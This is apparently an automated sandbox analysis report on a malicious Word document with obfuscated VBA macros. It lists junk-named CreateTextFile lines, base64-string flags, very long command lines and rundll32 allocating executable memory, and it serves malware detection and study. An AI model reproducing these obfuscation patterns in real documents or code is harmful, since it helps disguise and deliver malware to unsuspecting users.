Source: dat_513543.doc	OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: dat_513543.doc	OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: dat_513543.doc	OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: dat_513543.doc	OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
Source: dat_513543.doc	OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: dat_513543.doc	OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: dat_513543.doc	OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: dat_513543.doc	OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: dat_513543.doc	OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: dat_513543.doc	OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: dat_513543.doc	OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: dat_513543.doc	OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: dat_513543.doc	OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: dat_513543.doc	OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: dat_513543.doc	OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	Name: Hrs2a1p95u19
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	Name: Hrs2a1p95u19

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5709
Source: unknown	Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5613	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Mwmjhjl\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000976F	7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B41F	7_2_0024B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242C63	7_2_00242C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00253895	7_2_00253895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024C0C6	7_2_0024C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024EE78	7_2_0024EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024568E	7_2_0024568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002502C3	7_2_002502C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002542DA	7_2_002542DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00248736	7_2_00248736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247B63	7_2_00247B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00254B41	7_2_00254B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025340A	7_2_0025340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025687F	7_2_0025687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024F444	7_2_0024F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024E05A	7_2_0024E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025A0AF	7_2_0025A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002448BD	7_2_002448BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002460B9	7_2_002460B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002480BA	7_2_002480BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025889D	7_2_0025889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002488E5	7_2_002488E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00241CFA	7_2_00241CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002520C5	7_2_002520C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024F536	7_2_0024F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250D33	7_2_00250D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024153C	7_2_0024153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00257D03	7_2_00257D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B112	7_2_0024B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00255D1D	7_2_00255D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00258D1C	7_2_00258D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025511B	7_2_0025511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002469A0	7_2_002469A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00256DB9	7_2_00256DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002561B8	7_2_002561B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00259586	7_2_00259586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024F98C	7_2_0024F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00246D9F	7_2_00246D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247998	7_2_00247998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002531E2	7_2_002531E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002571EF	7_2_002571EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00244A35	7_2_00244A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00249A37	7_2_00249A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242A30	7_2_00242A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00257A0F	7_2_00257A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00255A61	7_2_00255A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024EA4C	7_2_0024EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002462A3	7_2_002462A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00241280	7_2_00241280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002512E2	7_2_002512E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002526F5	7_2_002526F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002496CD	7_2_002496CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00258ADC	7_2_00258ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024BB3A	7_2_0024BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250F0C	7_2_00250F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00252B16	7_2_00252B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00257F1F	7_2_00257F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024C769	7_2_0024C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250B68	7_2_00250B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024E377	7_2_0024E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00251773	7_2_00251773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00248F78	7_2_00248F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00245B79	7_2_00245B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00259B45	7_2_00259B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00252349	7_2_00252349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00258F49	7_2_00258F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00246754	7_2_00246754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B75F	7_2_0024B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002417AC	7_2_002417AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002573AC	7_2_002573AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025878F	7_2_0025878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024839D	7_2_0024839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00253FE7	7_2_00253FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002567E9	7_2_002567E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024D7EB	7_2_0024D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002563C1	7_2_002563C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00249FDC	7_2_00249FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00251BDF	7_2_00251BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021B41F	8_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00212C63	8_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021EE78	8_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021568E	8_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00223895	8_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002202C3	8_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021C0C6	8_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002242DA	8_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00218736	8_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00217B63	8_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00224B41	8_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002263C1	8_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00212A30	8_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00214A35	8_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00219A37	8_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0022340A	8_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00227A0F	8_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00225A61	8_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0022687F	8_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021F444	8_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021EA4C	8_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021E05A	8_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002162A3	8_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0022A0AF	8_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002160B9	8_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002180BA	8_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002148BD	8_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00211280	8_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0022889D	8_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002212E2	8_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002188E5	8_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002226F5	8_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00211CFA	8_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002220C5	8_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002196CD	8_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00228ADC	8_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00220D33	8_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021F536	8_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021BB3A	8_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021153C	8_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00227D03	8_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00220F0C	8_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021B112	8_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00222B16	8_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0022511B	8_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00227F1F	8_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00228D1C	8_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00225D1D	8_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021C769	8_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00220B68	8_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00221773	8_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021E377	8_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00215B79	8_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00218F78	8_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00229B45	8_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00222349	8_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00228F49	8_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00216754	8_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021B75F	8_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002169A0	8_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002117AC	8_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002273AC	8_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002261B8	8_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00226DB9	8_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00229586	8_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0022878F	8_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021F98C	8_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00217998	8_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021839D	8_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00216D9F	8_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002231E2	8_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00223FE7	8_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021D7EB	8_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002267E9	8_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_002271EF	8_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00221BDF	8_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00219FDC	8_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00472C63	9_2_00472C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047EE78	9_2_0047EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047B41F	9_2_0047B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047C0C6	9_2_0047C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004802C3	9_2_004802C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004842DA	9_2_004842DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047568E	9_2_0047568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00483895	9_2_00483895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00484B41	9_2_00484B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00477B63	9_2_00477B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00478736	9_2_00478736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004863C1	9_2_004863C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047F444	9_2_0047F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047EA4C	9_2_0047EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047E05A	9_2_0047E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00485A61	9_2_00485A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0048687F	9_2_0048687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0048340A	9_2_0048340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00487A0F	9_2_00487A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00479A37	9_2_00479A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00474A35	9_2_00474A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00472A30	9_2_00472A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004796CD	9_2_004796CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004820C5	9_2_004820C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00488ADC	9_2_00488ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004788E5	9_2_004788E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004812E2	9_2_004812E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00471CFA	9_2_00471CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004826F5	9_2_004826F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00471280	9_2_00471280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0048889D	9_2_0048889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004762A3	9_2_004762A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0048A0AF	9_2_0048A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004748BD	9_2_004748BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004780BA	9_2_004780BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004760B9	9_2_004760B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00482349	9_2_00482349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00488F49	9_2_00488F49
